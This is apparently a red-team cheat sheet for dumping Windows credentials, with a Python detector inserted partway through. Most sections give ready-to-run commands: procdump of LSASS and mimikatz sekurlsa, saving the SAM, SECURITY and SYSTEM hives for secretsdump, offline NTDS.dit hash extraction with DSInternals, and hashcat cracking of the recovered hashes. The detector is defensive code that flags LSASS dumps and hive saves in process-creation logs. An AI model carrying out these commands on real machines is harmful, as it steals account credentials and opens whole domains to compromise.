# Alternate Cred Dumps

## Internal Monologue

Internal Monologue is a way of dumping creds without touching LSASS.

#### Using Internal Monologue

```
execute-assembly /root/ADShare/NET4.6.2/InternalMonologue.exe [help]
```

#### Cracking Returned Hashes

```
hashcat hashes.txt /usr/share/wordlists/rockyou.txt -m 5500 --force
```

## Procdump + Mimikatz

```
# Dump with the Sysinternals signed Windows binary
procdump64.exe -accepteula -ma lsass.exe lsass.dmp

# Move lsass.dmp offline and use mimikatz to open and dump passwords
mimikatz # sekurlsa::minidump /root/lsass.dmp
mimikatz # sekurlsa::logonpasswords 

# Viewing the dump with Invoke-Mimikatz
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump C:\lsass.dmp" "sekurlsa::logonpasswords"'
```

## Reg SAM / Security / System

```
reg save hklm\system system
reg save hklm\security security 
reg save hklm\sam sam

# Extract
python secretsdump.py -security security -system system -sam sam LOCAL

# Cracking recovered MS-Cachev2 hashes
# Put each hash in this format:
# $DCC2$10240#username#hash

# Crack:
hashcat -m2100 '$DCC2$10240#spot#3407de6ff2f044ab21711a394d85f3b8' /usr/share/wordlists/rockyou.txt --force --potfile-disable
```
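A defender-side view of the Procdump and reg save sections above, as an added example that is not part of the original cheat sheet: a Python matcher for the command lines those two techniques leave in process-creation logs. The event tuples, alert names and the `detect` function are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed (host, command line) records shaped like Sysmon Event ID 1 or
# Security 4688 process-creation data; not taken from a real environment.
SAMPLE_EVENTS = [
    ("WS01", r"procdump64.exe -accepteula -ma lsass.exe lsass.dmp"),
    ("WS02", r"reg  save HKLM\SYSTEM system"),
    ("WS02", r'reg.exe save "hklm\security" security'),
    ("WS02", r"REG SAVE HKEY_LOCAL_MACHINE\SAM sam"),
    ("WS03", r"reg save hklm\software\vendor backup.hiv"),  # benign hive
    ("WS03", r"procdump.exe -ma notepad.exe np.dmp"),       # benign target
]

# procdump full-memory dump (-ma or /ma) aimed at lsass, any case or path.
PROCDUMP_LSASS = re.compile(
    r"procdump(64)?(\.exe)?\b.*[-/]ma\b.*\blsass(\.exe)?\b", re.I)

# reg save of exactly the SAM, SECURITY or SYSTEM hive root (not a subkey).
REG_SAVE_HIVE = re.compile(
    r'\breg(\.exe)?"?\s+save\s+"?(hklm|hkey_local_machine)'
    r"\\(?P<hive>sam|security|system)\b(?!\\)", re.I)


def detect(events):
    """Return (alerts, hosts) where hosts saved a decryptable hive set."""
    alerts, hives = [], defaultdict(set)
    for host, cmd in events:
        if PROCDUMP_LSASS.search(cmd):
            alerts.append((host, "lsass_memory_dump"))
        match = REG_SAVE_HIVE.search(cmd)
        if match:
            hive = match.group("hive").lower()
            hives[host].add(hive)
            alerts.append((host, "hive_save:" + hive))
    # SYSTEM holds the boot key; paired with SAM or SECURITY on one host it
    # is enough for the offline extraction step shown in the section above.
    escalate = sorted(h for h, s in hives.items()
                      if "system" in s and s & {"sam", "security"})
    return alerts, escalate


if __name__ == "__main__":
    found, hosts = detect(SAMPLE_EVENTS)
    for host, name in found:
        print(host, name)
    print("escalate:", hosts)
```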

## Offline DCSync

```
# For this you need the NTDS.dit file and the SYSTEM registry hive
# You will also need DSInternals PowerShell module. This can be moved across machines.

# Import DSInternals
import-module C:\Users\Administrator\Documents\DS\DSInternals\4.3\DSInternals.psd1

# Grab the bootkey from the SYSTEM hive. This can be done offline or in a mounted DC VM.
$key = Get-BootKey -SystemHivePath D:\Windows\System32\config\SYSTEM
 
# Extract user information from NTDS.dit
Get-ADDBAccount -All -DBPath 'D:\Windows\System32\ntds.dit' -BootKey $key
 
# Extract Hashes from NTDS.dit in a dcsync format
Get-ADDBAccount -All -DBPath 'D:\Windows\System32\ntds.dit' -BootKey $key | Format-Custom -View HashcatNT | Out-File vault-hashes.txt -Encoding ASCII

# The file can then be cracked or used as normal DCSync output would be.
```

